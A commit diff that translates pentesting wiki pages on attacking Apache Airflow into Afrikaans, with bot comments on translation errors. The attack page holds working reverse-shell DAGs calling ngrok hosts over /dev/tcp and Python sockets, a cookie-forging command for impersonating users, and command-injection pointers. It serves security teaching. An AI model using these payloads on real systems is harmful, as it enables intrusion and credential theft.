Translated ['src/README.md', 'src/banners/hacktricks-training.md', 'src/

This commit is contained in:
Translator
2024-12-31 20:29:08 +00:00
parent 2753c75e8b
commit 396dbafaf2
245 changed files with 9878 additions and 12609 deletions

View File

@@ -2,22 +2,21 @@
{{#include ../../banners/hacktricks-training.md}}
### Basic Information
### Basiese Inligting
[**Apache Airflow**](https://airflow.apache.org) serves as a platform for **orchestrating and scheduling data pipelines or workflows**. The term "orchestration" in the context of data pipelines signifies the process of arranging, coordinating, and managing complex data workflows originating from various sources. The primary purpose of these orchestrated data pipelines is to furnish processed and consumable data sets. These data sets are extensively utilized by a myriad of applications, including but not limited to business intelligence tools, data science and machine learning models, all of which are foundational to the functioning of big data applications.
[**Apache Airflow**](https://airflow.apache.org) dien as 'n platform vir **die orkestrering en skedulering van datapipelines of werksvloei**. Die term "orkestrering" in die konteks van datapipelines dui op die proses van die rangskikking, koördinering en bestuur van komplekse dataverkies wat uit verskeie bronne ontstaan. Die primêre doel van hierdie georkestreerde datapipelines is om verwerkte en verbruikbare datastelle te verskaf. Hierdie datastelle word wyd gebruik deur 'n menigte toepassings, insluitend maar nie beperk tot besigheidsintelligensie-instrumente, datawetenskap en masjienleer modelle, wat almal fundamenteel is vir die funksionering van groot data toepassings.
Basically, Apache Airflow will allow you to **schedule the execution of code when something** (event, cron) **happens**.
Basies sal Apache Airflow jou toelaat om **die uitvoering van kode te skeduleer wanneer iets** (gebeurtenis, cron) **gebeur**.
### Local Lab
### Plaaslike Laboratorium
#### Docker-Compose
You can use the **docker-compose config file from** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) to launch a complete apache airflow docker environment. (If you are in MacOS make sure to give at least 6GB of RAM to the docker VM).
Jy kan die **docker-compose konfigurasie lêer van** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) gebruik om 'n volledige apache airflow docker omgewing te begin. (As jy op MacOS is, maak seker jy gee ten minste 6GB RAM aan die docker VM).
#### Minikube
One easy way to **run apache airflo**w is to run it **with minikube**:
Een maklike manier om **apache airflow** te **hardloop is om dit met minikube** te hardloop:
```bash
helm repo add airflow-stable https://airflow-helm.github.io/charts
helm repo update
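Review bot: in the translated Basic Information paragraph, `komplekse dataverkies` is not a rendering of "complex data workflows"; "dataverkies" is not an Afrikaans word and reads like a mangled token. Suggest `komplekse datawerkvloeie`, which matches the `werksvloei` already used in the first sentence of the same line. The rest of the hunk (Local Lab, Docker-Compose and Minikube headings, the RAM note) reads fine, and the fenced `helm` commands are left untouched, which is the right treatment for code in a translation pass.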
@@ -27,10 +26,9 @@ helm install airflow-release airflow-stable/airflow
# Use this command to delete it
helm delete airflow-release
```
### Airflow Konfigurasie
### Airflow Configuration
Airflow might store **sensitive information** in its configuration or you can find weak configurations in place:
Airflow mag **sensitiewe inligting** in sy konfigurasie stoor of jy kan swak konfigurasies in plek vind:
{{#ref}}
airflow-configuration.md
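Review bot: line order in this hunk is reversed relative to most of the commit: `### Airflow Konfigurasie` is listed before `### Airflow Configuration`, while most heading pairs elsewhere show the English line first. Worth confirming that the English heading is the one being removed and the Afrikaans one retained, so the file does not end up with both headings or with the untranslated one. The `{{#ref}}` block that follows is context and should keep its `{{#endref}}` closer in the unchanged lines below.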
@@ -38,65 +36,62 @@ airflow-configuration.md
### Airflow RBAC
Before start attacking Airflow you should understand **how permissions work**:
Voordat jy begin om Airflow aan te val, moet jy verstaan **hoe toestemmings werk**:
{{#ref}}
airflow-rbac.md
{{#endref}}
### Attacks
### Aanvalle
#### Web Console Enumeration
#### Web Konsolering
If you have **access to the web console** you might be able to access some or all of the following information:
As jy **toegang tot die webkonsol** het, mag jy in staat wees om sommige of al die volgende inligting te bekom:
- **Variables** (Custom sensitive information might be stored here)
- **Connections** (Custom sensitive information might be stored here)
- Access them in `http://<airflow>/connection/list/`
- [**Configuration**](./#airflow-configuration) (Sensitive information like the **`secret_key`** and passwords might be stored here)
- List **users & roles**
- **Code of each DAG** (which might contain interesting info)
- **Veranderlikes** (Pasgemaakte sensitiewe inligting mag hier gestoor word)
- **Verbindings** (Pasgemaakte sensitiewe inligting mag hier gestoor word)
- Toegang tot hulle in `http://<airflow>/connection/list/`
- [**Konfigurasie**](./#airflow-configuration) (Sensitiewe inligting soos die **`secret_key`** en wagwoorde mag hier gestoor word)
- Lys **gebruikers & rolle**
- **Kode van elke DAG** (wat interessante inligting mag bevat)
#### Retrieve Variables Values
#### Herwin Veranderlikes Waardes
Variables can be stored in Airflow so the **DAGs** can **access** their values. It's similar to secrets of other platforms. If you have **enough permissions** you can access them in the GUI in `http://<airflow>/variable/list/`.\
Airflow by default will show the value of the variable in the GUI, however, according to [**this**](https://marclamberti.com/blog/variables-with-apache-airflow/) it's possible to set a **list of variables** whose **value** will appear as **asterisks** in the **GUI**.
Veranderlikes kan in Airflow gestoor word sodat die **DAGs** hul waardes kan **toegang**. Dit is soortgelyk aan geheime van ander platforms. As jy **genoeg toestemmings** het, kan jy hulle in die GUI in `http://<airflow>/variable/list/` toegang.\
Airflow sal standaard die waarde van die veranderlike in die GUI wys, egter, volgens [**hierdie**](https://marclamberti.com/blog/variables-with-apache-airflow/) is dit moontlik om 'n **lys van veranderlikes** in te stel waarvan die **waarde** as **sterretjies** in die **GUI** sal verskyn.
![](<../../images/image (164).png>)
However, these **values** can still be **retrieved** via **CLI** (you need to have DB access), **arbitrary DAG** execution, **API** accessing the variables endpoint (the API needs to be activated), and **even the GUI itself!**\
To access those values from the GUI just **select the variables** you want to access and **click on Actions -> Export**.\
Another way is to perform a **bruteforce** to the **hidden value** using the **search filtering** it until you get it:
Egter, hierdie **waardes** kan steeds **herwin** word via **CLI** (jy moet DB toegang hê), **arbitraire DAG** uitvoering, **API** toegang tot die veranderlikes eindpunt (die API moet geaktiveer wees), en **selfs die GUI self!**\
Om toegang tot daardie waardes vanaf die GUI te verkry, kies net die **veranderlikes** wat jy wil toegang en **klik op Aksies -> Eksporteer**.\
'n Ander manier is om 'n **bruteforce** op die **verborge waarde** uit te voer deur die **soekfilter** totdat jy dit kry:
![](<../../images/image (152).png>)
#### Privilege Escalation
If the **`expose_config`** configuration is set to **True**, from the **role User** and **upwards** can **read** the **config in the web**. In this config, the **`secret_key`** appears, which means any user with this valid they can **create its own signed cookie to impersonate any other user account**.
#### Privilege Escalatie
As die **`expose_config`** konfigurasie op **Waar** gestel is, kan die **rol Gebruiker** en **bo** die **konfig in die web** **lees**. In hierdie konfig, verskyn die **`secret_key`**, wat beteken enige gebruiker met hierdie geldige kan **sy eie onderteken koekie skep om enige ander gebruikersrekening na te boots**.
```bash
flask-unsign --sign --secret '<secret_key>' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}"
```
#### DAG Backdoor (RCE in Airflow worker)
If you have **write access** to the place where the **DAGs are saved**, you can just **create one** that will send you a **reverse shell.**\
Note that this reverse shell is going to be executed inside an **airflow worker container**:
As jy **skrywe toegang** het tot die plek waar die **DAGs gestoor word**, kan jy eenvoudig **een skep** wat vir jou 'n **omgekeerde skulp** sal stuur.\
Let daarop dat hierdie omgekeerde skulp binne 'n **airflow worker container** uitgevoer gaan word:
```python
import pendulum
from airflow import DAG
from airflow.operators.bash import BashOperator
with DAG(
dag_id='rev_shell_bash',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
dag_id='rev_shell_bash',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
run = BashOperator(
task_id='run',
bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1',
)
run = BashOperator(
task_id='run',
bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1',
)
```
```python
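Review bot: the body lines of the `rev_shell_bash` DAG appear twice in this hunk (`dag_id='rev_shell_bash'`, `schedule_interval='0 0 * * *'`, `start_date=...`, and again the whole `run = BashOperator(` block), which means the translation pass rewrote lines inside the fenced Python block. A whitespace-only change there alters Python indentation, and the `with DAG(...) as dag:` body will not parse if it lost its indent; fenced code should be excluded from translation and restored byte-for-byte from the source file. Two wording problems as well: `#### Web Konsolering` is not an Afrikaans rendering of "Web Console Enumeration" (`Konsolering` is not a word), suggest `#### Webkonsole-enumerasie`; and `enige gebruiker met hierdie geldige kan` copies the broken English "any user with this valid they can", which should read "any user with this value can" in both languages (`enige gebruiker met hierdie waarde kan`).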
@@ -105,75 +100,66 @@ from airflow import DAG
from airflow.operators.python import PythonOperator
def rs(rhost, port):
s = socket.socket()
s.connect((rhost, port))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")
s = socket.socket()
s.connect((rhost, port))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")
with DAG(
dag_id='rev_shell_python',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
dag_id='rev_shell_python',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
run = PythonOperator(
task_id='rs_python',
python_callable=rs,
op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433}
)
run = PythonOperator(
task_id='rs_python',
python_callable=rs,
op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433}
)
```
#### DAG Backdoor (RCE in Airflow scheduler)
If you set something to be **executed in the root of the code**, at the moment of this writing, it will be **executed by the scheduler** after a couple of seconds after placing it inside the DAG's folder.
As jy iets stel om **uitgevoer te word in die wortel van die kode**, op die oomblik van hierdie skrywe, sal dit **deur die skeduleerder uitgevoer word** na 'n paar sekondes nadat dit binne die DAG se gids geplaas is.
```python
import pendulum, socket, os, pty
from airflow import DAG
from airflow.operators.python import PythonOperator
def rs(rhost, port):
s = socket.socket()
s.connect((rhost, port))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")
s = socket.socket()
s.connect((rhost, port))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")
rs("2.tcp.ngrok.io", 14403)
with DAG(
dag_id='rev_shell_python2',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
dag_id='rev_shell_python2',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
run = PythonOperator(
task_id='rs_python2',
python_callable=rs,
op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}
run = PythonOperator(
task_id='rs_python2',
python_callable=rs,
op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}
```
#### DAG Skepping
#### DAG Creation
As jy daarin slaag om 'n **masjien binne die DAG-kluster te kompromitteer**, kan jy nuwe **DAG-skripte** in die `dags/` gids skep en hulle sal **in die res van die masjiene** binne die DAG-kluster **gekopieer word**.
If you manage to **compromise a machine inside the DAG cluster**, you can create new **DAGs scripts** in the `dags/` folder and they will be **replicated in the rest of the machines** inside the DAG cluster.
#### DAG Kode Inspuiting
#### DAG Code Injection
Wanneer jy 'n DAG vanaf die GUI uitvoer, kan jy **argumente** aan dit **oorgee**.\
Daarom, as die DAG nie behoorlik gekodeer is nie, kan dit **kwulnerabel wees vir Opdrag Inspuiting.**\
Dit is wat in hierdie CVE gebeur het: [https://www.exploit-db.com/exploits/49927](https://www.exploit-db.com/exploits/49927)
When you execute a DAG from the GUI you can **pass arguments** to it.\
Therefore, if the DAG is not properly coded it could be **vulnerable to Command Injection.**\
That is what happened in this CVE: [https://www.exploit-db.com/exploits/49927](https://www.exploit-db.com/exploits/49927)
All you need to know to **start looking for command injections in DAGs** is that **parameters** are **accessed** with the code **`dag_run.conf.get("param_name")`**.
Moreover, the same vulnerability might occur with **variables** (note that with enough privileges you could **control the value of the variables** in the GUI). Variables are **accessed with**:
Alles wat jy moet weet om **te begin soek na opdrag inspuitings in DAGs** is dat **parameters** met die kode **`dag_run.conf.get("param_name")`** **toegang verkry**.
Boonop kan dieselfde kwesbaarheid voorkom met **veranderlikes** (let daarop dat jy met genoeg voorregte die **waarde van die veranderlikes** in die GUI kan **beheer**). Veranderlikes word **toegang verkry met**:
```python
from airflow.models import Variable
[...]
foo = Variable.get("foo")
```
If they are used for example inside a a bash command, you could perform a command injection.
As hulle byvoorbeeld binne 'n bash-opdrag gebruik word, kan jy 'n opdraginjeksie uitvoer.
{{#include ../../banners/hacktricks-training.md}}
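Review bot: the same in-fence rewrite shows up here: the `rs()` body (`s = socket.socket()` through `pty.spawn("/bin/sh")`) and the DAG/operator keyword lines are each listed twice in both Python blocks, so their indentation was touched by the translation pass; with the `def rs(rhost, port):` body or the `with DAG(` body unindented, neither snippet parses. Restore both code blocks verbatim. While the scheduler block is being touched, note that it was already inconsistent before this commit: `rs("2.tcp.ngrok.io", 14403)` uses port 14403 but `op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}` uses 144, and the `PythonOperator(` call has no closing parenthesis before the fence. In the prose, `kwulnerabel` is not Afrikaans; the same hunk uses `kwesbaarheid` two paragraphs later, so `kwesbaar wees vir Opdrag Inspuiting` keeps the terminology consistent. The English source line `inside a a bash command` has a doubled article that the translation correctly drops.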

View File

@@ -1,115 +1,105 @@
# Airflow Configuration
# Airflow Konfigurasie
{{#include ../../banners/hacktricks-training.md}}
## Configuration File
## Konfigurasie Lêer
**Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.**
**Apache Airflow** genereer 'n **konfigurasie lêer** in al die airflow masjiene genaamd **`airflow.cfg`** in die huis van die airflow gebruiker. Hierdie konfigurasie lêer bevat konfigurasie-inligting en **kan interessante en sensitiewe inligting bevat.**
**There are two ways to access this file: By compromising some airflow machine, or accessing the web console.**
**Daar is twee maniere om toegang tot hierdie lêer te verkry: Deur 'n paar airflow masjiene te kompromitteer, of deur toegang tot die webkonsol.**
Note that the **values inside the config file** **might not be the ones used**, as you can overwrite them setting env variables such as `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`.
Let daarop dat die **waardes binne die konfigurasie lêer** **nie diegene mag wees wat gebruik word nie**, aangesien jy dit kan oorskryf deur omgewingsveranderlikes soos `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'` in te stel.
If you have access to the **config file in the web server**, you can check the **real running configuration** in the same page the config is displayed.\
If you have **access to some machine inside the airflow env**, check the **environment**.
As jy toegang het tot die **konfigurasie lêer in die webbediener**, kan jy die **werklike lopende konfigurasie** op dieselfde bladsy waar die konfigurasie vertoon word, nagaan.\
As jy **toegang het tot 'n paar masjiene binne die airflow omgewing**, kyk na die **omgewing**.
Some interesting values to check when reading the config file:
Sommige interessante waardes om na te kyk wanneer jy die konfigurasie lêer lees:
### \[api]
- **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS**
- **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS**
- **`access_control_allow_origins`**: This indicates the **allowed origins** for **CORS**
- **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) a few options can be in place to configure who can access to the API:
- `airflow.api.auth.backend.deny_all`: **By default nobody** can access the API
- `airflow.api.auth.backend.default`: **Everyone can** access it without authentication
- `airflow.api.auth.backend.kerberos_auth`: To configure **kerberos authentication**
- `airflow.api.auth.backend.basic_auth`: For **basic authentication**
- `airflow.composer.api.backend.composer_auth`: Uses composers authentication (GCP) (from [**here**](https://cloud.google.com/composer/docs/access-airflow-api)).
- `composer_auth_user_registration_role`: This indicates the **role** the **composer user** will get inside **airflow** (**Op** by default).
- You can also **create you own authentication** method with python.
- **`google_key_path`:** Path to the **GCP service account key**
- **`access_control_allow_headers`**: Dit dui die **toegelate** **koppe** vir **CORS** aan
- **`access_control_allow_methods`**: Dit dui die **toegelate metodes** vir **CORS** aan
- **`access_control_allow_origins`**: Dit dui die **toegelate oorspronge** vir **CORS** aan
- **`auth_backend`**: [**Volgens die dokumentasie**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) kan 'n paar opsies in plek wees om te konfigureer wie toegang tot die API kan hê:
- `airflow.api.auth.backend.deny_all`: **Standaard kan niemand** toegang tot die API hê nie
- `airflow.api.auth.backend.default`: **Enigiemand kan** toegang hê sonder verifikasie
- `airflow.api.auth.backend.kerberos_auth`: Om **kerberos-verifikasie** te konfigureer
- `airflow.api.auth.backend.basic_auth`: Vir **basiese verifikasie**
- `airflow.composer.api.backend.composer_auth`: Gebruik komponiste se verifikasie (GCP) (van [**hier**](https://cloud.google.com/composer/docs/access-airflow-api)).
- `composer_auth_user_registration_role`: Dit dui die **rol** aan wat die **komponiste gebruiker** binne **airflow** sal kry (**Op** standaard).
- Jy kan ook jou eie **verifikasie** metode met python skep.
- **`google_key_path`:** Pad na die **GCP diensrekening sleutel**
### **\[atlas]**
- **`password`**: Atlas password
- **`username`**: Atlas username
- **`password`**: Atlas wagwoord
- **`username`**: Atlas gebruikersnaam
### \[celery]
- **`flower_basic_auth`** : Credentials (_user1:password1,user2:password2_)
- **`result_backend`**: Postgres url which may contain **credentials**.
- **`ssl_cacert`**: Path to the cacert
- **`ssl_cert`**: Path to the cert
- **`ssl_key`**: Path to the key
- **`flower_basic_auth`** : Kredensiale (_user1:password1,user2:password2_)
- **`result_backend`**: Postgres url wat **kredensiale** kan bevat.
- **`ssl_cacert`**: Pad na die cacert
- **`ssl_cert`**: Pad na die sertifikaat
- **`ssl_key`**: Pad na die sleutel
### \[core]
- **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that dont contain the strings `DAG` and `airflow`.
- **`fernet_key`**: Key to store encrypted variables (symmetric)
- **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections.
- **`security`**: What security module to use (for example kerberos)
- **`dag_discovery_safe_mode`**: Geaktiveer deur standaard. Wanneer DAGs ontdek word, ignoreer enige lêers wat nie die strings `DAG` en `airflow` bevat nie.
- **`fernet_key`**: Sleutel om versleutelde veranderlikes te stoor (simmetries)
- **`hide_sensitive_var_conn_fields`**: Geaktiveer deur standaard, verberg sensitiewe inligting van verbindings.
- **`security`**: Watter sekuriteitsmodule om te gebruik (byvoorbeeld kerberos)
### \[dask]
- **`tls_ca`**: Path to ca
- **`tls_cert`**: Part to the cert
- **`tls_key`**: Part to the tls key
- **`tls_ca`**: Pad na ca
- **`tls_cert`**: Pad na die sertifikaat
- **`tls_key`**: Pad na die tls sleutel
### \[kerberos]
- **`ccache`**: Path to ccache file
- **`forwardable`**: Enabled by default
- **`ccache`**: Pad na ccache lêer
- **`forwardable`**: Geaktiveer deur standaard
### \[logging]
- **`google_key_path`**: Path to GCP JSON creds.
- **`google_key_path`**: Pad na GCP JSON kredensiale.
### \[secrets]
- **`backend`**: Full class name of secrets backend to enable
- **`backend_kwargs`**: The backend_kwargs param is loaded into a dictionary and passed to **init** of secrets backend class.
- **`backend`**: Volledige klasnaam van die secrets backend om te aktiveer
- **`backend_kwargs`**: Die backend_kwargs parameter word in 'n woordeboek gelaai en aan **init** van die secrets backend klas oorgedra.
### \[smtp]
- **`smtp_password`**: SMTP password
- **`smtp_user`**: SMTP user
- **`smtp_password`**: SMTP wagwoord
- **`smtp_user`**: SMTP gebruiker
### \[webserver]
- **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value
- **`cookie_secure`**: Set **secure flag** on the the session cookie
- **`expose_config`**: By default is False, if true, the **config** can be **read** from the web **console**
- **`expose_stacktrace`**: By default it's True, it will show **python tracebacks** (potentially useful for an attacker)
- **`secret_key`**: This is the **key used by flask to sign the cookies** (if you have this you can **impersonate any user in Airflow**)
- **`web_server_ssl_cert`**: **Path** to the **SSL** **cert**
- **`web_server_ssl_key`**: **Path** to the **SSL** **Key**
- **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible
- **`cookie_samesite`**: Standaard is dit **Lax**, so dit is reeds die swakste moontlike waarde
- **`cookie_secure`**: Stel **veilige vlag** op die sessie koekie
- **`expose_config`**: Standaard is dit Vals, as waar, kan die **konfigurasie** **gelees** word vanaf die web **konsol**
- **`expose_stacktrace`**: Standaard is dit Waar, dit sal **python tracebacks** vertoon (potensieel nuttig vir 'n aanvaller)
- **`secret_key`**: Dit is die **sleutel wat deur flask gebruik word om die koekies te teken** (as jy dit het, kan jy **enige gebruiker in Airflow naboots**)
- **`web_server_ssl_cert`**: **Pad** na die **SSL** **sertifikaat**
- **`web_server_ssl_key`**: **Pad** na die **SSL** **Sleutel**
- **`x_frame_enabled`**: Standaard is **Waar**, so klikjacking is nie moontlik nie
### Web Authentication
By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as
### Web Verifikasie
Standaard word **web verifikasie** in die lêer **`webserver_config.py`** gespesifiseer en is geconfigureer as
```bash
AUTH_TYPE = AUTH_DB
```
Which means that the **authentication is checked against the database**. However, other configurations are possible like
Wat beteken dat die **authentisering teen die databasis nagegaan word**. egter, ander konfigurasies is moontlik soos
```bash
AUTH_TYPE = AUTH_OAUTH
```
Om die **verifikasie aan derdeparty-dienste** oor te laat.
To leave the **authentication to third party services**.
However, there is also an option to a**llow anonymous users access**, setting the following parameter to the **desired role**:
Daar is egter ook 'n opsie om **anonieme gebruikers toegang** te gee, deur die volgende parameter op die **gewenste rol** in te stel:
```bash
AUTH_ROLE_PUBLIC = 'Admin'
```
{{#include ../../banners/hacktricks-training.md}}
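Review bot: `airflow.composer.api.backend.composer_auth` is described as using `komponiste se verifikasie` and `composer_auth_user_registration_role` as the role of the `komponiste gebruiker`; Composer here is Google Cloud Composer, a product name, not a musician, so it should stay `Composer` (`gebruik Composer se verifikasie (GCP)`, `die Composer-gebruiker`). Smaller points in the same hunk: `Deur 'n paar airflow masjiene te kompromitteer` and `toegang het tot 'n paar masjiene` turn "some airflow machine" (any single machine) into "a few machines", which overstates what is needed; `'n airflow masjien` / `'n masjien` matches the English. `geconfigureer` is the Dutch spelling, Afrikaans is `gekonfigureer`, and `egter` after the full stop should be capitalised. The `### \[api]` style section headers and the fenced `AUTH_TYPE` / `AUTH_ROLE_PUBLIC` blocks are left as context, which is correct.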

View File

@@ -4,44 +4,40 @@
## RBAC
(From the docs)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users could **configure/alter the permissions for other roles**. But it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to these roles.
(From the docs)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow verskaf 'n **stel rolle standaard**: **Admin**, **User**, **Op**, **Viewer**, en **Public**. **Slegs `Admin`** gebruikers kan **die toestemmings vir ander rolle konfigureer/wysig**. Maar dit word nie aanbeveel dat `Admin` gebruikers hierdie standaard rolle op enige manier verander deur toestemmings van hierdie rolle te verwyder of by te voeg nie.
- **`Admin`** users have all possible permissions.
- **`Public`** users (anonymous) dont have any permissions.
- **`Viewer`** users have limited viewer permissions (only read). It **cannot see the config.**
- **`User`** users have `Viewer` permissions plus additional user permissions that allows him to manage DAGs a bit. He **can see the config file**
- **`Op`** users have `User` permissions plus additional op permissions.
- **`Admin`** gebruikers het alle moontlike toestemmings.
- **`Public`** gebruikers (anoniem) het geen toestemmings nie.
- **`Viewer`** gebruikers het beperkte kyktoestemmings (slegs lees). Dit **kan nie die konfigurasie sien nie.**
- **`User`** gebruikers het `Viewer` toestemmings plus addisionele gebruikers toestemmings wat hom toelaat om DAGs 'n bietjie te bestuur. Hy **kan die konfigurasie lêer sien.**
- **`Op`** gebruikers het `User` toestemmings plus addisionele operasionele toestemmings.
Note that **admin** users can **create more roles** with more **granular permissions**.
Let daarop dat **admin** gebruikers kan **meer rolle skep** met meer **fynere toestemmings**.
Also note that the only default role with **permission to list users and roles is Admin, not even Op** is going to be able to do that.
Neem ook kennis dat die enigste standaard rol met **toestemming om gebruikers en rolle te lys is Admin, nie eens Op** sal dit kan doen nie.
### Default Permissions
These are the default permissions per default role:
Hierdie is die standaard toestemmings per standaard rol:
- **Admin**
\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on Roles, can read on Permissions, can delete on Roles, can edit on Roles, can create on Roles, can read on Users, can create on Users, can edit on Users, can delete on Users, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs, can read on Task Reschedules, menu access on Task Reschedules, can read on Triggers, menu access on Triggers, can read on Passwords, can edit on Passwords, menu access on List Users, menu access on Security, menu access on List Roles, can read on User Stats Chart, menu access on User's Statistics, menu access on Base Permissions, can read on View Menus, menu access on Views/Menus, can read on Permission Views, menu access on Permission on Views/Menus, 
can get on MenuApi, menu access on Providers, can create on XComs]
\[kan verwyder op Connections, kan lees op Connections, kan wysig op Connections, kan skep op Connections, kan lees op DAGs, kan wysig op DAGs, kan verwyder op DAGs, kan lees op DAG Runs, kan lees op Task Instances, kan wysig op Task Instances, kan verwyder op DAG Runs, kan skep op DAG Runs, kan wysig op DAG Runs, kan lees op Audit Logs, kan lees op ImportError, kan verwyder op Pools, kan lees op Pools, kan wysig op Pools, kan skep op Pools, kan lees op Providers, kan verwyder op Variables, kan lees op Variables, kan wysig op Variables, kan skep op Variables, kan lees op XComs, kan lees op DAG Code, kan lees op Configurations, kan lees op Plugins, kan lees op Roles, kan lees op Permissions, kan verwyder op Roles, kan wysig op Roles, kan skep op Roles, kan lees op Users, kan skep op Users, kan wysig op Users, kan verwyder op Users, kan lees op DAG Dependencies, kan lees op Jobs, kan lees op My Password, kan wysig op My Password, kan lees op My Profile, kan wysig op My Profile, kan lees op SLA Misses, kan lees op Task Logs, kan lees op Website, menu toegang op Browse, menu toegang op DAG Dependencies, menu toegang op DAG Runs, menu toegang op Documentation, menu toegang op Docs, menu toegang op Jobs, menu toegang op Audit Logs, menu toegang op Plugins, menu toegang op SLA Misses, menu toegang op Task Instances, kan skep op Task Instances, kan verwyder op Task Instances, menu toegang op Admin, menu toegang op Configurations, menu toegang op Connections, menu toegang op Pools, menu toegang op Variables, menu toegang op XComs, kan verwyder op XComs, kan lees op Task Reschedules, menu toegang op Task Reschedules, kan lees op Triggers, menu toegang op Triggers, kan lees op Passwords, kan wysig op Passwords, menu toegang op List Users, menu toegang op Security, menu toegang op List Roles, kan lees op User Stats Chart, menu toegang op User's Statistics, menu toegang op Base Permissions, kan lees op View Menus, menu toegang op Views/Menus, kan lees op Permission Views, menu 
toegang op Permission on Views/Menus, kan kry op MenuApi, menu toegang op Providers, kan skep op XComs]
- **Op**
\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs]
